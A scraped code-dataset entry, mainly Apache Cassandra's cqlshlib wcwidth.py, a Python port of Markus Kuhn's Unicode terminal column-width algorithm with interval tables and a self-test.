for placeholder, value in substitutions.items():
    template = template.replace(placeholder, value)

with open('download.html', 'w', encoding='utf-8') as dlf:
    dlf.write(template)
| unlicense |
pcn/cassandra-1 | pylib/cqlshlib/wcwidth.py | 113 | 16049 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# adapted from http://www.cl.cam.ac.uk/~mgk25/ucs/wcwidth.c
# -thepaul
# This is an implementation of wcwidth() and wcswidth() (defined in
# IEEE Std 1002.1-2001) for Unicode.
#
# http://www.opengroup.org/onlinepubs/007904975/functions/wcwidth.html
# http://www.opengroup.org/onlinepubs/007904975/functions/wcswidth.html
#
# In fixed-width output devices, Latin characters all occupy a single
# "cell" position of equal width, whereas ideographic CJK characters
# occupy two such cells. Interoperability between terminal-line
# applications and (teletype-style) character terminals using the
# UTF-8 encoding requires agreement on which character should advance
# the cursor by how many cell positions. No established formal
# standards exist at present on which Unicode character shall occupy
# how many cell positions on character terminals. These routines are
# a first attempt of defining such behavior based on simple rules
# applied to data provided by the Unicode Consortium.
#
# For some graphical characters, the Unicode standard explicitly
# defines a character-cell width via the definition of the East Asian
# FullWidth (F), Wide (W), Half-width (H), and Narrow (Na) classes.
# In all these cases, there is no ambiguity about which width a
# terminal shall use. For characters in the East Asian Ambiguous (A)
# class, the width choice depends purely on a preference of backward
# compatibility with either historic CJK or Western practice.
# Choosing single-width for these characters is easy to justify as
# the appropriate long-term solution, as the CJK practice of
# displaying these characters as double-width comes from historic
# implementation simplicity (8-bit encoded characters were displayed
# single-width and 16-bit ones double-width, even for Greek,
# Cyrillic, etc.) and not any typographic considerations.
#
# Much less clear is the choice of width for the Not East Asian
# (Neutral) class. Existing practice does not dictate a width for any
# of these characters. It would nevertheless make sense
# typographically to allocate two character cells to characters such
# as for instance EM SPACE or VOLUME INTEGRAL, which cannot be
# represented adequately with a single-width glyph. The following
# routines at present merely assign a single-cell width to all
# neutral characters, in the interest of simplicity. This is not
# entirely satisfactory and should be reconsidered before
# establishing a formal standard in this area. At the moment, the
# decision which Not East Asian (Neutral) characters should be
# represented by double-width glyphs cannot yet be answered by
# applying a simple rule from the Unicode database content. Setting
# up a proper standard for the behavior of UTF-8 character terminals
# will require a careful analysis not only of each Unicode character,
# but also of each presentation form, something the author of these
# routines has avoided to do so far.
#
# http://www.unicode.org/unicode/reports/tr11/
#
# Markus Kuhn -- 2007-05-26 (Unicode 5.0)
#
# Permission to use, copy, modify, and distribute this software
# for any purpose and without fee is hereby granted. The author
# disclaims all warranties with regard to this software.
#
# Latest C version: http://www.cl.cam.ac.uk/~mgk25/ucs/wcwidth.c
# auxiliary function for binary search in interval table
# auxiliary function for binary search in interval table
def bisearch(ucs, table):
    """Return 1 if codepoint *ucs* falls inside any interval of *table*,
    else 0.

    *table* is a sorted, non-overlapping tuple of inclusive
    (first, last) codepoint pairs.
    """
    if not table:
        # generalization: an empty table used to raise IndexError
        return 0
    lo = 0
    hi = len(table) - 1
    if ucs < table[0][0] or ucs > table[hi][1]:
        return 0
    while hi >= lo:
        # // keeps the midpoint an int on Python 3 as well; the old
        # "(min + max) / 2" produced a float index there.  Also renamed
        # min/max -> lo/hi to stop shadowing the builtins.
        mid = (lo + hi) // 2
        if ucs > table[mid][1]:
            lo = mid + 1
        elif ucs < table[mid][0]:
            hi = mid - 1
        else:
            return 1
    return 0
# The following two functions define the column width of an ISO 10646
# character as follows:
#
# - The null character (U+0000) has a column width of 0.
#
# - Other C0/C1 control characters and DEL will lead to a return
# value of -1.
#
# - Non-spacing and enclosing combining characters (general
# category code Mn or Me in the Unicode database) have a
# column width of 0.
#
# - SOFT HYPHEN (U+00AD) has a column width of 1.
#
# - Other format characters (general category code Cf in the Unicode
# database) and ZERO WIDTH SPACE (U+200B) have a column width of 0.
#
# - Hangul Jamo medial vowels and final consonants (U+1160-U+11FF)
# have a column width of 0.
#
# - Spacing characters in the East Asian Wide (W) or East Asian
# Full-width (F) category as defined in Unicode Technical
# Report #11 have a column width of 2.
#
# - All remaining characters (including all printable
# ISO 8859-1 and WGL4 characters, Unicode control characters,
# etc.) have a column width of 1.
#
# This implementation assumes that wchar_t characters are encoded
# in ISO 10646.
# sorted list of non-overlapping intervals of non-spacing characters
# generated by "uniset +cat=Me +cat=Mn +cat=Cf -00AD +1160-11FF +200B c"
combining = (
( 0x0300, 0x036F ), ( 0x0483, 0x0486 ), ( 0x0488, 0x0489 ),
( 0x0591, 0x05BD ), ( 0x05BF, 0x05BF ), ( 0x05C1, 0x05C2 ),
( 0x05C4, 0x05C5 ), ( 0x05C7, 0x05C7 ), ( 0x0600, 0x0603 ),
( 0x0610, 0x0615 ), ( 0x064B, 0x065E ), ( 0x0670, 0x0670 ),
( 0x06D6, 0x06E4 ), ( 0x06E7, 0x06E8 ), ( 0x06EA, 0x06ED ),
( 0x070F, 0x070F ), ( 0x0711, 0x0711 ), ( 0x0730, 0x074A ),
( 0x07A6, 0x07B0 ), ( 0x07EB, 0x07F3 ), ( 0x0901, 0x0902 ),
( 0x093C, 0x093C ), ( 0x0941, 0x0948 ), ( 0x094D, 0x094D ),
( 0x0951, 0x0954 ), ( 0x0962, 0x0963 ), ( 0x0981, 0x0981 ),
( 0x09BC, 0x09BC ), ( 0x09C1, 0x09C4 ), ( 0x09CD, 0x09CD ),
( 0x09E2, 0x09E3 ), ( 0x0A01, 0x0A02 ), ( 0x0A3C, 0x0A3C ),
( 0x0A41, 0x0A42 ), ( 0x0A47, 0x0A48 ), ( 0x0A4B, 0x0A4D ),
( 0x0A70, 0x0A71 ), ( 0x0A81, 0x0A82 ), ( 0x0ABC, 0x0ABC ),
( 0x0AC1, 0x0AC5 ), ( 0x0AC7, 0x0AC8 ), ( 0x0ACD, 0x0ACD ),
( 0x0AE2, 0x0AE3 ), ( 0x0B01, 0x0B01 ), ( 0x0B3C, 0x0B3C ),
( 0x0B3F, 0x0B3F ), ( 0x0B41, 0x0B43 ), ( 0x0B4D, 0x0B4D ),
( 0x0B56, 0x0B56 ), ( 0x0B82, 0x0B82 ), ( 0x0BC0, 0x0BC0 ),
( 0x0BCD, 0x0BCD ), ( 0x0C3E, 0x0C40 ), ( 0x0C46, 0x0C48 ),
( 0x0C4A, 0x0C4D ), ( 0x0C55, 0x0C56 ), ( 0x0CBC, 0x0CBC ),
( 0x0CBF, 0x0CBF ), ( 0x0CC6, 0x0CC6 ), ( 0x0CCC, 0x0CCD ),
( 0x0CE2, 0x0CE3 ), ( 0x0D41, 0x0D43 ), ( 0x0D4D, 0x0D4D ),
( 0x0DCA, 0x0DCA ), ( 0x0DD2, 0x0DD4 ), ( 0x0DD6, 0x0DD6 ),
( 0x0E31, 0x0E31 ), ( 0x0E34, 0x0E3A ), ( 0x0E47, 0x0E4E ),
( 0x0EB1, 0x0EB1 ), ( 0x0EB4, 0x0EB9 ), ( 0x0EBB, 0x0EBC ),
( 0x0EC8, 0x0ECD ), ( 0x0F18, 0x0F19 ), ( 0x0F35, 0x0F35 ),
( 0x0F37, 0x0F37 ), ( 0x0F39, 0x0F39 ), ( 0x0F71, 0x0F7E ),
( 0x0F80, 0x0F84 ), ( 0x0F86, 0x0F87 ), ( 0x0F90, 0x0F97 ),
( 0x0F99, 0x0FBC ), ( 0x0FC6, 0x0FC6 ), ( 0x102D, 0x1030 ),
( 0x1032, 0x1032 ), ( 0x1036, 0x1037 ), ( 0x1039, 0x1039 ),
( 0x1058, 0x1059 ), ( 0x1160, 0x11FF ), ( 0x135F, 0x135F ),
( 0x1712, 0x1714 ), ( 0x1732, 0x1734 ), ( 0x1752, 0x1753 ),
( 0x1772, 0x1773 ), ( 0x17B4, 0x17B5 ), ( 0x17B7, 0x17BD ),
( 0x17C6, 0x17C6 ), ( 0x17C9, 0x17D3 ), ( 0x17DD, 0x17DD ),
( 0x180B, 0x180D ), ( 0x18A9, 0x18A9 ), ( 0x1920, 0x1922 ),
( 0x1927, 0x1928 ), ( 0x1932, 0x1932 ), ( 0x1939, 0x193B ),
( 0x1A17, 0x1A18 ), ( 0x1B00, 0x1B03 ), ( 0x1B34, 0x1B34 ),
( 0x1B36, 0x1B3A ), ( 0x1B3C, 0x1B3C ), ( 0x1B42, 0x1B42 ),
( 0x1B6B, 0x1B73 ), ( 0x1DC0, 0x1DCA ), ( 0x1DFE, 0x1DFF ),
( 0x200B, 0x200F ), ( 0x202A, 0x202E ), ( 0x2060, 0x2063 ),
( 0x206A, 0x206F ), ( 0x20D0, 0x20EF ), ( 0x302A, 0x302F ),
( 0x3099, 0x309A ), ( 0xA806, 0xA806 ), ( 0xA80B, 0xA80B ),
( 0xA825, 0xA826 ), ( 0xFB1E, 0xFB1E ), ( 0xFE00, 0xFE0F ),
( 0xFE20, 0xFE23 ), ( 0xFEFF, 0xFEFF ), ( 0xFFF9, 0xFFFB ),
( 0x10A01, 0x10A03 ), ( 0x10A05, 0x10A06 ), ( 0x10A0C, 0x10A0F ),
( 0x10A38, 0x10A3A ), ( 0x10A3F, 0x10A3F ), ( 0x1D167, 0x1D169 ),
( 0x1D173, 0x1D182 ), ( 0x1D185, 0x1D18B ), ( 0x1D1AA, 0x1D1AD ),
( 0x1D242, 0x1D244 ), ( 0xE0001, 0xE0001 ), ( 0xE0020, 0xE007F ),
( 0xE0100, 0xE01EF )
)
# sorted list of non-overlapping intervals of East Asian Ambiguous
# characters, generated by "uniset +WIDTH-A -cat=Me -cat=Mn -cat=Cf c"
ambiguous = (
( 0x00A1, 0x00A1 ), ( 0x00A4, 0x00A4 ), ( 0x00A7, 0x00A8 ),
( 0x00AA, 0x00AA ), ( 0x00AE, 0x00AE ), ( 0x00B0, 0x00B4 ),
( 0x00B6, 0x00BA ), ( 0x00BC, 0x00BF ), ( 0x00C6, 0x00C6 ),
( 0x00D0, 0x00D0 ), ( 0x00D7, 0x00D8 ), ( 0x00DE, 0x00E1 ),
( 0x00E6, 0x00E6 ), ( 0x00E8, 0x00EA ), ( 0x00EC, 0x00ED ),
( 0x00F0, 0x00F0 ), ( 0x00F2, 0x00F3 ), ( 0x00F7, 0x00FA ),
( 0x00FC, 0x00FC ), ( 0x00FE, 0x00FE ), ( 0x0101, 0x0101 ),
( 0x0111, 0x0111 ), ( 0x0113, 0x0113 ), ( 0x011B, 0x011B ),
( 0x0126, 0x0127 ), ( 0x012B, 0x012B ), ( 0x0131, 0x0133 ),
( 0x0138, 0x0138 ), ( 0x013F, 0x0142 ), ( 0x0144, 0x0144 ),
( 0x0148, 0x014B ), ( 0x014D, 0x014D ), ( 0x0152, 0x0153 ),
( 0x0166, 0x0167 ), ( 0x016B, 0x016B ), ( 0x01CE, 0x01CE ),
( 0x01D0, 0x01D0 ), ( 0x01D2, 0x01D2 ), ( 0x01D4, 0x01D4 ),
( 0x01D6, 0x01D6 ), ( 0x01D8, 0x01D8 ), ( 0x01DA, 0x01DA ),
( 0x01DC, 0x01DC ), ( 0x0251, 0x0251 ), ( 0x0261, 0x0261 ),
( 0x02C4, 0x02C4 ), ( 0x02C7, 0x02C7 ), ( 0x02C9, 0x02CB ),
( 0x02CD, 0x02CD ), ( 0x02D0, 0x02D0 ), ( 0x02D8, 0x02DB ),
( 0x02DD, 0x02DD ), ( 0x02DF, 0x02DF ), ( 0x0391, 0x03A1 ),
( 0x03A3, 0x03A9 ), ( 0x03B1, 0x03C1 ), ( 0x03C3, 0x03C9 ),
( 0x0401, 0x0401 ), ( 0x0410, 0x044F ), ( 0x0451, 0x0451 ),
( 0x2010, 0x2010 ), ( 0x2013, 0x2016 ), ( 0x2018, 0x2019 ),
( 0x201C, 0x201D ), ( 0x2020, 0x2022 ), ( 0x2024, 0x2027 ),
( 0x2030, 0x2030 ), ( 0x2032, 0x2033 ), ( 0x2035, 0x2035 ),
( 0x203B, 0x203B ), ( 0x203E, 0x203E ), ( 0x2074, 0x2074 ),
( 0x207F, 0x207F ), ( 0x2081, 0x2084 ), ( 0x20AC, 0x20AC ),
( 0x2103, 0x2103 ), ( 0x2105, 0x2105 ), ( 0x2109, 0x2109 ),
( 0x2113, 0x2113 ), ( 0x2116, 0x2116 ), ( 0x2121, 0x2122 ),
( 0x2126, 0x2126 ), ( 0x212B, 0x212B ), ( 0x2153, 0x2154 ),
( 0x215B, 0x215E ), ( 0x2160, 0x216B ), ( 0x2170, 0x2179 ),
( 0x2190, 0x2199 ), ( 0x21B8, 0x21B9 ), ( 0x21D2, 0x21D2 ),
( 0x21D4, 0x21D4 ), ( 0x21E7, 0x21E7 ), ( 0x2200, 0x2200 ),
( 0x2202, 0x2203 ), ( 0x2207, 0x2208 ), ( 0x220B, 0x220B ),
( 0x220F, 0x220F ), ( 0x2211, 0x2211 ), ( 0x2215, 0x2215 ),
( 0x221A, 0x221A ), ( 0x221D, 0x2220 ), ( 0x2223, 0x2223 ),
( 0x2225, 0x2225 ), ( 0x2227, 0x222C ), ( 0x222E, 0x222E ),
( 0x2234, 0x2237 ), ( 0x223C, 0x223D ), ( 0x2248, 0x2248 ),
( 0x224C, 0x224C ), ( 0x2252, 0x2252 ), ( 0x2260, 0x2261 ),
( 0x2264, 0x2267 ), ( 0x226A, 0x226B ), ( 0x226E, 0x226F ),
( 0x2282, 0x2283 ), ( 0x2286, 0x2287 ), ( 0x2295, 0x2295 ),
( 0x2299, 0x2299 ), ( 0x22A5, 0x22A5 ), ( 0x22BF, 0x22BF ),
( 0x2312, 0x2312 ), ( 0x2460, 0x24E9 ), ( 0x24EB, 0x254B ),
( 0x2550, 0x2573 ), ( 0x2580, 0x258F ), ( 0x2592, 0x2595 ),
( 0x25A0, 0x25A1 ), ( 0x25A3, 0x25A9 ), ( 0x25B2, 0x25B3 ),
( 0x25B6, 0x25B7 ), ( 0x25BC, 0x25BD ), ( 0x25C0, 0x25C1 ),
( 0x25C6, 0x25C8 ), ( 0x25CB, 0x25CB ), ( 0x25CE, 0x25D1 ),
( 0x25E2, 0x25E5 ), ( 0x25EF, 0x25EF ), ( 0x2605, 0x2606 ),
( 0x2609, 0x2609 ), ( 0x260E, 0x260F ), ( 0x2614, 0x2615 ),
( 0x261C, 0x261C ), ( 0x261E, 0x261E ), ( 0x2640, 0x2640 ),
( 0x2642, 0x2642 ), ( 0x2660, 0x2661 ), ( 0x2663, 0x2665 ),
( 0x2667, 0x266A ), ( 0x266C, 0x266D ), ( 0x266F, 0x266F ),
( 0x273D, 0x273D ), ( 0x2776, 0x277F ), ( 0xE000, 0xF8FF ),
( 0xFFFD, 0xFFFD ), ( 0xF0000, 0xFFFFD ), ( 0x100000, 0x10FFFD )
)
def mk_wcwidth(ucs):
    """Return the number of terminal columns occupied by code point *ucs*.

    Returns 0 for NUL and combining marks, -1 for other C0/C1 control
    characters, 2 for East Asian wide/fullwidth characters, and 1 for
    everything else (Markus Kuhn's wcwidth algorithm).
    """
    # NUL occupies no column at all.
    if ucs == 0:
        return 0
    # Remaining C0 controls (< 0x20) and DEL/C1 controls (0x7f-0x9f)
    # are non-printable.
    if ucs < 32 or 0x7f <= ucs < 0xa0:
        return -1
    # Combining characters occupy no column of their own.
    # (bisearch/combining are defined elsewhere in this file.)
    if bisearch(ucs, combining):
        return 0
    # Everything below U+1100 that reaches this point is narrow.
    if ucs < 0x1100:
        return 1
    # Check the East Asian wide / fullwidth ranges.
    is_wide = (
        ucs <= 0x115f or                                  # Hangul Jamo init. consonants
        ucs == 0x2329 or ucs == 0x232a or
        (0x2e80 <= ucs <= 0xa4cf and ucs != 0x303f) or    # CJK ... Yi
        0xac00 <= ucs <= 0xd7a3 or                        # Hangul Syllables
        0xf900 <= ucs <= 0xfaff or                        # CJK Compatibility Ideographs
        0xfe10 <= ucs <= 0xfe19 or                        # Vertical forms
        0xfe30 <= ucs <= 0xfe6f or                        # CJK Compatibility Forms
        0xff00 <= ucs <= 0xff60 or                        # Fullwidth Forms
        0xffe0 <= ucs <= 0xffe6 or
        0x20000 <= ucs <= 0x2fffd or
        0x30000 <= ucs <= 0x3fffd
    )
    return 2 if is_wide else 1
def mk_wcswidth(pwcs):
    """Return the total column width of the iterable of code points
    *pwcs*, or -1 if it contains any non-printable character."""
    total = 0
    for ucs in pwcs:
        cols = mk_wcwidth(ucs)
        if cols < 0:
            # One control character makes the whole string unprintable.
            return -1
        total += cols
    return total
# The following functions are the same as mk_wcwidth() and
# mk_wcswidth(), except that spacing characters in the East Asian
# Ambiguous (A) category as defined in Unicode Technical Report #11
# have a column width of 2. This variant might be useful for users of
# CJK legacy encodings who want to migrate to UCS without changing
# the traditional terminal character-width behaviour. It is not
# otherwise recommended for general use.
def mk_wcwidth_cjk(ucs):
    """Like mk_wcwidth(), except East Asian Ambiguous (UAX #11 class A)
    characters are counted as 2 columns."""
    # Binary search in the table of ambiguous-width characters; fall
    # back to the normal width otherwise.
    return 2 if bisearch(ucs, ambiguous) else mk_wcwidth(ucs)
def mk_wcswidth_cjk(pwcs):
    """CJK-legacy variant of mk_wcswidth(): total column width of the
    code points in *pwcs*, or -1 on any non-printable character."""
    total = 0
    for ucs in pwcs:
        cols = mk_wcwidth_cjk(ucs)
        if cols < 0:
            return -1
        total += cols
    return total
# python-y versions, dealing with unicode objects
def wcwidth(c):
    """Column width of the single unicode character *c*."""
    code_point = ord(c)
    return mk_wcwidth(code_point)
def wcswidth(s):
    """Column width of the unicode string *s*, or -1 if it contains any
    non-printable character."""
    return mk_wcswidth([ord(ch) for ch in s])
def wcwidth_cjk(c):
    """Column width of character *c*, counting East Asian Ambiguous
    characters as 2 columns."""
    code_point = ord(c)
    return mk_wcwidth_cjk(code_point)
def wcswidth_cjk(s):
    """Column width of string *s* with East Asian Ambiguous characters
    counted as 2 columns; -1 on non-printables."""
    return mk_wcswidth_cjk([ord(ch) for ch in s])
if __name__ == "__main__":
    # Self-test for the width functions above.
    # Pairs of (unicode character name, expected column width) covering
    # narrow (1), wide (2) and zero-width (0) cases.
    samples = (
        ('MUSIC SHARP SIGN', 1),
        ('FULLWIDTH POUND SIGN', 2),
        ('FULLWIDTH LATIN CAPITAL LETTER P', 2),
        ('CJK RADICAL BOLT OF CLOTH', 2),
        ('LATIN SMALL LETTER A', 1),
        ('LATIN SMALL LETTER AE', 1),
        ('SPACE', 1),
        ('NO-BREAK SPACE', 1),
        ('CJK COMPATIBILITY IDEOGRAPH-F920', 2),
        ('MALAYALAM VOWEL SIGN UU', 0),
        ('ZERO WIDTH SPACE', 0),
        ('ZERO WIDTH NO-BREAK SPACE', 0),
        ('COMBINING PALATALIZED HOOK BELOW', 0),
        ('COMBINING GRAVE ACCENT', 0),
    )
    # Control characters: wcwidth must report these as non-printable (-1).
    nonprinting = u'\r\n\t\a\b\f\v\x7f'
    import unicodedata
    # Check each named sample against its expected width.
    for name, printwidth in samples:
        uchr = unicodedata.lookup(name)
        calculatedwidth = wcwidth(uchr)
        assert calculatedwidth == printwidth, \
            'width for %r should be %d, but is %d?' % (uchr, printwidth, calculatedwidth)
    # Every control character must come back negative.
    for c in nonprinting:
        calculatedwidth = wcwidth(c)
        assert calculatedwidth < 0, \
            '%r is a control character, but wcwidth gives %d' % (c, calculatedwidth)
    assert wcwidth('\0') == 0 # special case
    # depending on how python is compiled, code points above U+FFFF may not be
    # treated as single characters, so ord() won't work. test a few of these
    # manually.
    assert mk_wcwidth(0xe01ef) == 0
    assert mk_wcwidth(0x10ffff) == 1
    assert mk_wcwidth(0x3fffd) == 2
    # Mixed string: NUL (0) + narrow latin + one wide Hangul syllable +
    # one zero-width space should total 17 columns.
    teststr = u'B\0ig br\u00f8wn moose\ub143\u200b'
    calculatedwidth = wcswidth(teststr)
    assert calculatedwidth == 17, 'expected 17, got %d' % calculatedwidth
    # In CJK-ambiguous mode, the o-with-stroke counts as 2 columns (18 total).
    calculatedwidth = wcswidth_cjk(teststr)
    assert calculatedwidth == 18, 'expected 18, got %d' % calculatedwidth
    # A string containing a control character (\a) is unprintable overall.
    assert wcswidth(u'foobar\u200b\a') < 0
    print 'tests pass.'
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.